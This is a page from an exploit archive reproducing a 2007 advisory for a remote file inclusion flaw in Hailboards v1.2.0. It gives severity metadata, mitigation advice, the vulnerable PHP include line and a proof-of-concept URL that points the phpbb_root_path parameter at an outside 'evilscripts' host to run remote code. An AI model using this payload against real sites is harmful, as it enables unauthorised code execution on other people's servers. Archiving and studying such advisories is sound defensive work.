Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Hailboards v1.2.0 (phpbb_root_path) Remote File Include Exploit - exploit.company
header-logo
Suggest Exploit
vendor:
Hailboards
by:
xoron
7.5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: Hailboards
Affected Version From: 1.2.2000
Affected Version To: 1.2.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Hailboards v1.2.0 (phpbb_root_path) Remote File Include Exploit

This exploit takes advantage of a vulnerability in Hailboards v1.2.0 where it allows remote file inclusion. By including a malicious file through the 'phpbb_root_path' parameter, an attacker can execute arbitrary code on the target system. The exploit code is provided in the given link.

Mitigation:

To mitigate this vulnerability, it is recommended to update Hailboards to a patched version that addresses this issue. Additionally, it is advised to sanitize user input and implement proper input validation in the application.
Source

Exploit-DB raw data:

-----------------------------------------------

Hailboards v1.2.0 (phpbb_root_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz - xoron.info

-----------------------------------------------

Code:

include($phpbb_root_path . 'includes/bbcode.'.$phpEx);

-----------------------------------------------

POC:

www.[target].com/[script_pat]/includes/usercp_viewprofile.php?phpbb_root_path=http://evilscripts?

-----------------------------------------------

Exploit:

www.xoron.info/bugs/hailboards.txt

-----------------------------------------------

download: http://hailboards.org/

-----------------------------------------------

Tesekkurler: pang0, chaos, can bjorn

Thanx: str0ke, kacper

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir cocuk xoron.

Adimizi altin harflerle yazdik.

-----------------------------------------------

# milw0rm.com [2007-01-31]